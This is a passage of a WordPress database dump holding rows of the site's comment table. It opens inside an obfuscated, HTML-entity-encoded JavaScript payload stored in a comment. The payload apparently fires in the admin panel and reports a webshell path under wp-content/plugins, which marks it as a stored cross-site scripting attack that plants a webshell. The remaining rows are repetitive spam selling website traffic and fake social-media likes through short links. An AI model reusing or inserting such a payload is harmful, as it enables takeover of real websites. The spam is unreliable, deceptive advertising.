#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#117;&#098;&#115;&#116;&#114;&#105;&#110;&#103;&#040;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#105;&#110;&#100;&#101;&#120;&#079;&#102;&#040;&#039;&#119;&#112;&#045;&#097;&#100;&#109;&#105;&#110;&#039;&#041;&#044;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#105;&#110;&#102;&#111;&#040;&#039;&#087;&#101;&#098;&#115;&#104;&#101;&#108;&#108;&#65306;&#039;&#043;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#116;&#101;&#109;&#112;&#044;&#034;&#119;&#112;&#045;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#047;&#112;&#108;&#117;&#103;&#105;&#110;&#115;&#047;&#034;&#043;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#041;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#125;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#102;&#097;&#105;&#108;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#101;&#114;&#114;&#111;&#114;&#034;&#041;&#059;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#097;&#108;&#119;&#097;&#121;&#115;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#125;&#041;&#059;\" style=\"display:block;position:absolute;width:100%;height:100%;top:0;left:0;\" \'><a></abbr></a>', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(152, 1, 'Mark', 'mark357177@hotmail.com', 'http://www.FyLitCl7Pf7kjQdDUOLQOuaxTXbj5iNG.com', '188.143.232.70', '2016-01-29 20:15:46', '2016-01-29 20:15:46', 'mFCLbZ http://www.FyLitCl7Pf7kjQdDUOLQOuaxTXbj5iNG.com', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', '', 0, 0),
(153, 1, 'Natalie', 'qijvsuih@srhfdhs.com', 'http://yxbp.com/5kje', '45.40.37.103', '2016-04-13 10:07:26', '2016-04-13 10:07:26', 'I was just looking at your Hello world! | Cross Training Center (Namur) site and see that your site has the potential to become very popular. I just want to tell you, In case you don\'t already know... There is a website service which already has more than 16 million users, and the majority of the users are looking for topics like yours. By getting your website on this service you have a chance to get your site more popular than you can imagine. It is free to sign up and you can read more about it here: http://yxbp.com/2m6y - Now, let me ask you... Do you need your site to be successful to maintain your way of life? Do you need targeted visitors who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your website? If your answer is YES, you can achieve these things only if you get your website on the network I am describing. This traffic network advertises you to thousands, while also giving you a chance to test the service before paying anything at all. All the popular websites are using this network to boost their traffic and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful site works... Here\'s to your success! Read more here: http://yxbp.com/5kje', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(154, 1, 'Emily', 'yrksgbfl@gmail.com', 'http://mariowelte.de/8ajy', '37.9.44.241', '2016-05-01 01:09:13', '2016-05-01 01:09:13', 'Hello my name is Emily and I just wanted to send you a quick message here instead of calling you. I discovered your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more hits. I have found that the key to running a popular website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get keyword targeted traffic from and they let you try the service for free for 7 days. I managed to get over 300 targeted visitors to day to my site. Visit them here: http://janluetzler.de/5ier', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(155, 1, 'Donna', 'wsgtobsi@gmail.com', 'http://nfc.lol/7uzt', '23.95.253.154', '2016-05-07 07:33:16', '2016-05-07 07:33:16', 'Hello, I tried calling you several times today, and I\'m not getting through for some reason. If your website does not have many Facebook Likes, why would someone visit your Facebook Fanpage? People Like you when other people like you. The more people that LIKE your website and fanpage on Facebook, the more credibility you will have with new visitors. It works the same for Twitter, Instagram and Youtube. When people visit your page and see that you have a lot of followers, they now want to follow you too. They too want to know what all the hype is and why all those people are following you. Get some free likes, followers, and views just for trying this service I found: http://shrtlnk.de/7w9i', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0);
INSERT INTO `wp_comments` (`comment_ID`, `comment_post_ID`, `comment_author`, `comment_author_email`, `comment_author_url`, `comment_author_IP`, `comment_date`, `comment_date_gmt`, `comment_content`, `comment_karma`, `comment_approved`, `comment_agent`, `comment_type`, `comment_parent`, `user_id`) VALUES
(156, 1, 'Donna', 'lntqureenao@gmail.com', 'http://janluetzler.de/3vm2', '23.95.251.133', '2016-05-16 08:42:53', '2016-05-16 08:42:53', 'Did you just create your new Facebook page? Do you want your page to look a little more \"established\"? I found a service that can help you with that. They can send organic and 100% real likes and followers to your social pages and you can try before you buy with their free trial. Their service is completely safe and they send all likes to your page naturally and over time so nobody will suspect that you bought them. Try their service for free here: http://janluetzler.de/3vm2', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(157, 1, 'Donna', 'oajaob@googlemail.com', 'http://yourls.endinahosting.com/zupe', '23.95.253.154', '2016-06-01 06:24:09', '2016-06-01 06:24:09', 'Did you just create your new Facebook page? Do you want your page to look a little more \"established\"? I found a service that can help you with that. They can send organic and 100% real likes and followers to your social pages and you can try before you buy with their free trial. Their service is completely safe and they send all likes to your page naturally and over time so nobody will suspect that you bought them. Try their service for free here: http://shrtlnk.de/7w9i', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(158, 1, 'Sabrina Warren', 'zgysuezzp@hyvagbn.com', 'http://kfon.eu/3', '69.16.147.156', '2017-02-23 03:22:44', '2017-02-23 03:22:44', 'Hi my name is Sabrina Warren and I just wanted to send you a quick message here instead of calling you. I discovered your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more hits. I have found that the key to running a popular website is making sure the visitors you are getting are interested in your website topic. There is a company that you can get keyword targeted traffic from and they let you try the service for free for 7 days. I managed to get over 300 targeted visitors to day to my site. http://smpros.tk/q', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(159, 1, 'Sabrina Warren', 'pggzmxk@pqmggzw.com', 'http://smpros.tk/q', '69.16.147.148', '2017-02-28 15:35:12', '2017-02-28 15:35:12', 'I was just looking at your Hello world! | Cross Training Center (Namur) website and see that your website has the potential to become very popular. I just want to tell you, In case you don\'t already know... There is a website network which already has more than 16 million users, and the majority of the users are looking for websites like yours. By getting your site on this network you have a chance to get your site more popular than you can imagine. It is free to sign up and you can find out more about it here: http://s.beautheac.net/52 - Now, let me ask you... Do you need your site to be successful to maintain your way of life? Do you need targeted visitors who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your site? If your answer is YES, you can achieve these things only if you get your website on the service I am describing. This traffic service advertises you to thousands, while also giving you a chance to test the network before paying anything at all. All the popular blogs are using this service to boost their traffic and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful site works... Here\'s to your success! Find out more here: http://acortarurl.es/5i', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(160, 1, 'Sandra', 'nxwnovdsip@nrnwpdi.com', 'http://shorturl.van.ee/8', '31.168.172.137', '2017-03-03 02:32:46', '2017-03-03 02:32:46', 'Did you just create your new Facebook page? Do you want your page to look a little more \"established\"? I found a service that can help you with that. They can send organic and 100% real likes and followers to your social pages and you can try before you buy with their free trial. Their service is completely safe and they send all likes to your page naturally and over time so nobody will suspect that you bought them. Try their service for free here: http://v-doc.co/nm/39zu3', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(161, 1, 'Vickie Figueroa', 'vcpkcc@soagklfa.com', 'http://link.virtualrick.com/8u', '208.167.254.86', '2017-03-16 16:47:10', '2017-03-16 16:47:10', 'I was just looking at your Hello world! | Cross Training Center (Namur) website and see that your site has the potential to get a lot of visitors. I just want to tell you, In case you don\'t already know... There is a website network which already has more than 16 million users, and most of the users are interested in topics like yours. By getting your site on this service you have a chance to get your site more visitors than you can imagine. It is free to sign up and you can read more about it here: http://link.virtualrick.com/8u - Now, let me ask you... Do you need your site to be successful to maintain your way of life? Do you need targeted traffic who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your website? If your answer is YES, you can achieve these things only if you get your website on the service I am talking about. This traffic service advertises you to thousands, while also giving you a chance to test the service before paying anything at all. All the popular blogs are using this service to boost their readership and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful website works... Here\'s to your success! Find out more here: http://kfon.eu/k', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(162, 1, 'Tami Sandoval', 'osljwqxxiti@miyabuy.com', 'http://wntdco.mx/vlyb4', '209.107.214.136', '2017-03-30 04:12:35', '2017-03-30 04:12:35', 'Hi my name is Tami Sandoval and I just wanted to send you a quick message here instead of calling you. I came to your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more traffic. I have found that the key to running a successful website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get keyword targeted visitors from and they let you try the service for free for 7 days. I managed to get over 300 targeted visitors to day to my website. http://soheavyblog.com/1m', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(163, 1, 'Elisa Brown', 'leyswgiuz@mrflazu.com', 'http://shorturl.van.ee/h', '81.171.97.125', '2017-04-24 05:51:52', '2017-04-24 05:51:52', 'I came across your Hello world! | Cross Training Center (Namur) website and wanted to let you know that we have decided to open our POWERFUL and PRIVATE web traffic system to the public for a limited time! You can sign up for our targeted traffic network with a free trial as we make this offer available again. If you need targeted traffic that is interested in your subject matter or products start your free trial today: http://priscilarodrigues.com.br/url/v', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(164, 1, 'Elisa Brown', 'exhneloegrv@fqehdcymi.com', 'http://priscilarodrigues.com.br/url/v', '205.185.209.130', '2017-04-28 22:17:38', '2017-04-28 22:17:38', 'This is a message to the Hello world! | Cross Training Center (Namur) admin. Your website is missing out on at least 300 visitors per day. Our traffic system will  dramatically increase your traffic to your website: http://priscilarodrigues.com.br/url/v - We offer 500 free targeted visitors during our free trial period and we offer up to 30,000 targeted visitors per month. Hope this helps :)                                                                                                                                                - Unsubscribe here: http://acortarurl.es/8y', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(165, 1, 'Chelsea Wallace', 'hqklgtrqgwh@fvrmaw.com', 'http://pcgroup.com.uy/15', '81.171.81.234', '2017-05-24 14:50:12', '2017-05-24 14:50:12', 'This is a message to the Hello world! | Cross Training Center (Namur) webmaster. Your website is missing out on at least 300 visitors per day. Our traffic system will  dramatically increase your traffic to your site: http://pcgroup.com.uy/15 - We offer 500 free targeted visitors during our free trial period and we offer up to 30,000 targeted visitors per month. Hope this helps :)																				Unsubscribe here: http://acortarurl.es/97', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(166, 1, 'Sarah Hughes', 'lnuawlisx@jdiszkxd.com', 'http://magc.co/7fe', '209.197.6.138', '2017-06-04 23:43:49', '2017-06-04 23:43:49', 'This is a message to the Hello world! | Cross Training Center (Namur) webmaster. Your website is missing out on at least 300 visitors per day. Our traffic system will  dramatically increase your traffic to your site: http://tdil.co/3p - We offer 500 free targeted visitors during our free trial period and we offer up to 30,000 targeted visitors per month. Hope this helps :)																				Unsubscribe here: http://tdil.co/5p', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(167, 1, 'Sarah Hughes', 'ghfqfdsus@tqlqjagzcz.com', 'http://priscilarodrigues.com.br/url/v', '196.52.32.11', '2017-06-14 02:53:08', '2017-06-14 02:53:08', 'I came across your Hello world! | Cross Training Center (Namur) website and wanted to let you know that we have decided to open our POWERFUL and PRIVATE web traffic system to the public for a limited time! You can sign up for our targeted traffic network with a free trial as we make this offer available again. If you need targeted traffic that is interested in your subject matter or products start your free trial today: http://magc.co/7fe																				Unsubscribe here: http://tdil.co/5p', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(168, 1, 'Ann Weaver', 'idllhldszt@gouxwnil.com', 'http://magc.co/7fe', '205.185.209.188', '2017-06-24 18:28:52', '2017-06-24 18:28:52', 'I came to your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more traffic. I have found that the key to running a website is making sure the visitors you are getting are interested in your subject matter. We can send you targeted traffic and we let you try it for free. Get over 1,000 targeted visitors per day to your website. Check it out here: http://stpicks.com/27																			Unsubscribe here: http://pcgroup.com.uy/2a', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(169, 1, 'Ann Weaver', 'bjzhzk@fjiauool.com', 'http://stpicks.com/27', '81.171.81.55', '2017-07-05 18:51:29', '2017-07-05 18:51:29', 'I came across your Hello world! | Cross Training Center (Namur) website and wanted to let you know that we have decided to open our POWERFUL and PRIVATE web traffic system to the public for a limited time! You can sign up for our targeted traffic network with a free trial as we make this offer available again. If you need targeted traffic that is interested in your subject matter or products start your free trial today: http://pcgroup.com.uy/15																				Unsubscribe here: http://pcgroup.com.uy/2a', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(170, 1, 'Ann Weaver', 'lugqhnd@sswzqo.com', 'http://pcgroup.com.uy/15', '196.54.55.18', '2017-07-19 23:25:56', '2017-07-19 23:25:56', 'I came to your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more traffic. I have found that the key to running a website is making sure the visitors you are getting are interested in your subject matter. We can send you targeted traffic and we let you try it for free. Get over 1,000 targeted visitors per day to your website. Check it out here: http://stpicks.com/27																			Unsubscribe here: http://priscilarodrigues.com.br/url/11', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(171, 1, 'Ann Weaver', 'nwxpntug@nyxculpvaq.com', 'http://tdil.co/3p', '81.171.81.227', '2017-07-25 21:25:01', '2017-07-25 21:25:01', 'I came across your Hello world! | Cross Training Center (Namur) website and wanted to let you know that we have decided to open our POWERFUL and PRIVATE website traffic system to the public for a limited time! You can sign up for our targeted traffic network with a free trial as we make this offer available again. If you need targeted traffic that is interested in your subject matter or products start your free trial today: http://pcgroup.com.uy/15																				Unsubscribe here: http://priscilarodrigues.com.br/url/11', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(172, 1, 'Ann Weaver', 'wpfkapwx@hbwbcnsdkmq.com', 'http://pcgroup.com.uy/15', '81.171.81.208', '2017-07-31 05:50:46', '2017-07-31 05:50:46', 'I came across your Hello world! | Cross Training Center (Namur) website and wanted to let you know that we have decided to open our POWERFUL and PRIVATE website traffic system to the public for a limited time! You can sign up for our targeted traffic network with a free trial as we make this offer available again. If you need targeted traffic that is interested in your subject matter or products start your free trial today: http://v-doc.co/nm/jkfq0																				Unsubscribe here: http://pcgroup.com.uy/2a', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(173, 1, 'Ann Weaver', 'wylsaj@qecdqclvnm.com', 'http://v-doc.co/nm/jkfq0', '193.218.154.84', '2017-08-04 14:59:46', '2017-08-04 14:59:46', 'This is a comment to the Hello world! | Cross Training Center (Namur) webmaster. Your website is missing out on at least 300 visitors per day. Our traffic system will  dramatically increase your traffic to your website: http://stpicks.com/27 - We offer 500 free targeted visitors during our free trial period and we offer up to 30,000 targeted visitors per month. Hope this helps :)																				Unsubscribe here: http://pcgroup.com.uy/2a', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(174, 1, 'Sarah Carlson', 'lugmhrudmfj@kplxqxlebzj.com', 'http://mylinks.top/h', '81.171.81.49', '2017-08-31 01:51:06', '2017-08-31 01:51:06', 'I discovered your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more traffic. I have found that the key to running a website is making sure the visitors you are getting are interested in your subject matter. We can send you targeted traffic and we let you try it for free. Get over 1,000 targeted visitors per day to your website. Start your free trial: http://v-doc.co/nm/jkfq0 															Unsubscribe here: http://priscilarodrigues.com.br/url/11', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(175, 1, 'Sarah Carlson', 'zoyrksdsif@hgqkcxkxcs.com', 'https://flxv.tk/6', '185.77.248.6', '2017-09-05 01:34:25', '2017-09-05 01:34:25', 'I discovered your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more traffic. I have found that the key to running a website is making sure the visitors you are getting are interested in your subject matter. We can send you targeted traffic and we let you try it for free. Get over 1,000 targeted visitors per day to your website. Start your free trial: http://priscilarodrigues.com.br/url/v 															Unsubscribe here: http://pcgroup.com.uy/2a', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(176, 1, 'Sarah Carlson', 'gzxibeqhyjg@kzpzacqlrh.com', 'http://url.euqueroserummacaco.com/ifa', '81.171.98.81', '2017-09-10 12:29:41', '2017-09-10 12:29:41', 'I came across your Hello world! | Cross Training Center (Namur) website and wanted to let you know that we have decided to open our POWERFUL and PRIVATE website traffic system to the public for a limited time! You can sign up for our targeted traffic network with a free trial as we make this offer available again. If you need targeted traffic that is interested in your subject matter or products start your free trial today: http://pcgroup.com.uy/15																													Unsubscribe here: http://priscilarodrigues.com.br/url/11', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(177, 1, 'Sarah Carlson', 'oeddkhzlr@zhzufud.com', 'http://segundaibc.com.br/go/1i', '196.52.32.12', '2017-09-18 16:29:19', '2017-09-18 16:29:19', 'I came across your Hello world! | Cross Training Center (Namur) website and wanted to let you know that we have decided to open our POWERFUL and PRIVATE web traffic system to the public for a limited time! You can sign up for our targeted traffic network with a free trial as we make this offer available again. If you need targeted traffic that is interested in your subject matter or products start your free trial today: http://pcgroup.com.uy/15																													Unsubscribe here: http://priscilarodrigues.com.br/url/11', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(178, 1, 'Sarah Carlson', 'wvwpeeyws@ntgyfhzgfdb.com', 'http://pcgroup.com.uy/15', '192.40.95.26', '2017-09-25 20:01:08', '2017-09-25 20:01:08', 'This is a comment to the Hello world! | Cross Training Center (Namur) webmaster. Your website is missing out on at least 300 visitors per day. Our traffic system will  dramatically increase your traffic to your site: http://pcgroup.com.uy/15 - We offer 500 free targeted visitors during our free trial period and we offer up to 30,000 targeted visitors per month. Hope this helps :) 																				Unsubscribe here: http://pcgroup.com.uy/2a', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(179, 1, 'Sarah Carlson', 'eyqgjiw@puhmetx.com', 'http://lis.ovh/is', '37.203.209.26', '2017-10-02 12:58:32', '2017-10-02 12:58:32', 'I discovered your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more traffic. I have found that the key to running a website is making sure the visitors you are getting are interested in your subject matter. We can send you targeted traffic and we let you try it for free. Get over 1,000 targeted visitors per day to your website. Start your free trial: https://flxv.tk/6 															Unsubscribe here: http://priscilarodrigues.com.br/url/11', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(180, 1, 'Sandra', 'yzhxfpddw@kdjqwl.com', 'http://v-doc.co/nm/39zu3', '192.40.95.25', '2017-10-16 23:53:04', '2017-10-16 23:53:04', 'Did you just create your new Facebook page? Do you want your page to look a little more \"established\"? I found a service that can help you with that. They can send organic and 100% real likes and followers to your social pages and you can try before you buy with their free trial. Their service is completely safe and they send all likes to your page naturally and over time so nobody will suspect that you bought them. Try the service for free here: http://corta.co/9UC																		Unsubscribe here: http://corta.co/eXu', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(181, 1, 'Sandra', 'jkbpko@zrxhcgyxkff.com', 'http://pcgroup.com.uy/1n134', '196.52.32.10', '2017-10-23 16:13:58', '2017-10-23 16:13:58', 'I decided to leave a message here on your Hello world! | Cross Training Center (Namur) page instead of calling you. Do you need more likes for your Facebook Fan Page? The more people that LIKE your website and fanpage on Facebook, the more credibility you will have with new visitors. It works the same for Twitter, Instagram and Youtube. When people visit your page and see that you have a lot of followers, they now want to follow you too. They too want to know what all the hype is and why all those people are following you. Get some free likes, followers, and views just for trying this service: http://s.t0m-s.be/42																		Unsubscribe here: http://priscilarodrigues.com.br/url/2l', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(182, 1, 'Erma Bowman', 'oaogvmnmb@czkxjr.com', 'http://url.euqueroserummacaco.com/ifa', '81.171.85.54', '2017-11-08 12:23:04', '2017-11-08 12:23:04', 'I am reaching out since we saw a link to your website and thought you would be a good candidate for our traffic service. We provide targeted website traffic to virtually any type of website. We target our visitors by both country and keywords that you either submit to us or we can do keyword research for you. We offer a seven day FREE trial period with free traffic so that you can try our service to make sure it will work for you. Which of your websites needs the most growth? Find out more here:http://segundaibc.com.br/go/1i																													Unsubscribe here: http://corta.co/f5m', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(183, 1, 'Erma Bowman', 'hzbdun@pggezbvrehr.com', 'http://segundaibc.com.br/go/1i', '81.171.75.156', '2017-11-13 12:53:24', '2017-11-13 12:53:24', 'I am reaching out since we saw a link to your website and thought you would be a good candidate for our traffic service. We provide targeted website traffic to virtually any type of website. We target our visitors by both country and keywords that you either submit to us or we can do keyword research for you. We offer a seven day FREE trial period with free traffic so that you can try our service to make sure it will work for you. Which of your websites needs the most growth? Find out more here:http://v-doc.co/nm/jkfq0																													Unsubscribe here: http://priscilarodrigues.com.br/url/11', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(184, 1, 'Virginia Williams', 'exizyxmro@yolnskirzz.com', 'http://0nulu.com/sdq', '81.171.56.66', '2017-11-19 10:53:46', '2017-11-19 10:53:46', 'I came across your Hello world! | Cross Training Center (Namur) website and wanted to let you know that we have decided to open our POWERFUL and PRIVATE website traffic system to the public for a limited time! You can sign up for our targeted traffic network with a free trial as we make this offer available again. If you need targeted traffic that is interested in your subject matter or products start your free trial today: http://0nulu.com/rjv																				Unsubscribe here: http://0nulu.com/mvx', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(185, 1, 'Virginia Williams', 'lpwxfkor@gmail.com', 'http://0nulu.com/csy', '81.171.71.121', '2017-11-29 16:18:44', '2017-11-29 16:18:44', 'I came across your Hello world! | Cross Training Center (Namur) website and wanted to let you know that we have decided to open our POWERFUL and PRIVATE website traffic system to the public for a limited time! You can sign up for our targeted traffic network with a free trial as we make this offer available again. If you need targeted traffic that is interested in your subject matter or products start your free trial today: http://0nulu.com/sdq																				Unsubscribe here: http://0nulu.com/nbz', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(186, 1, 'Virginia Williams', 'cbqkhtc@gmail.com', 'http://0nulu.com/csy', '196.54.55.30', '2017-12-08 06:29:26', '2017-12-08 06:29:26', 'I came to your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more traffic. I have found that the key to running a website is making sure the visitors you are getting are interested in your subject matter. We can send you targeted traffic and we let you try it for free. Get over 1,000 targeted visitors per day to your website. Check it out here: http://0nulu.com/rjv		 																	Unsubscribe here: http://0nulu.com/mvx', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(187, 1, 'Heidi Reynolds', 'swjohdniw@gmail.com', 'http://0nulu.com/csy', '91.108.183.43', '2017-12-14 11:04:17', '2017-12-14 11:04:17', 'This is a comment to the Hello world! | Cross Training Center (Namur) webmaster. Your website is missing out on at least 300 visitors per day. Our traffic system will  dramatically increase your traffic to your website: http://0nulu.com/sdq - We offer 500 free targeted visitors during our free trial period and we offer up to 30,000 targeted visitors per month. Hope this helps :)											 					Unsubscribe here: http://0nulu.com/mvx', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(188, 1, 'Heidi Reynolds', 'oasytnwez@gmail.com', 'http://0nulu.com/opx', '196.54.55.20', '2017-12-22 19:28:23', '2017-12-22 19:28:23', 'This is a comment to the Hello world! | Cross Training Center (Namur) webmaster. Your website is missing out on at least 300 visitors per day. Our traffic system will  dramatically increase your traffic to your website: http://0nulu.com/opx - We offer 500 free targeted visitors during our free trial period and we offer up to 30,000 targeted visitors per month. Hope this helps :)											 					Unsubscribe here: http://0nulu.com/mvx', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(189, 1, 'Heidi Reynolds', 'ptfuggvtx@gmail.com', 'http://0nulu.com/sdq', '81.171.81.48', '2018-01-04 12:09:27', '2018-01-04 12:09:27', 'I discovered your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more traffic. I have found that the key to running a website is making sure the visitors you are getting are interested in your subject matter. We can send you targeted traffic and we let you try it for free. Get over 1,000 targeted visitors per day to your website. Start your free trial: http://0nulu.com/rjv		 																	Unsubscribe here: http://0nulu.com/mvx', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(190, 1, 'Heidi Reynolds', 'wtkidzgje@gmail.com', 'http://0nulu.com/csy', '196.52.84.38', '2018-01-10 09:48:39', '2018-01-10 09:48:39', 'I discovered your Hello world! | Cross Training Center (Namur) page and noticed you could have a lot more traffic. I have found that the key to running a website is making sure the visitors you are getting are interested in your subject matter. We can send you targeted traffic and we let you try it for free. Get over 1,000 targeted visitors per day to your website. Check it out here: http://0nulu.com/sdq		 																	Unsubscribe here: http://0nulu.com/mvx', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(191, 1, 'Heidi Reynolds', 'ydxlkz@gmail.com', 'http://0nulu.com/opx', '78.192.252.18', '2018-01-18 12:06:39', '2018-01-18 12:06:39', 'I came across your Hello world! | Cross Training Center (Namur) website and wanted to let you know that we have decided to open our POWERFUL and PRIVATE web traffic system to the public for a limited time! You can sign up for our targeted traffic network with a free trial as we make this offer available again. If you need targeted traffic that is interested in your subject matter or products start your free trial today: http://0nulu.com/sdq																				Unsubscribe here: http://0nulu.com/mvx', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like 19753', '', 0, 0),
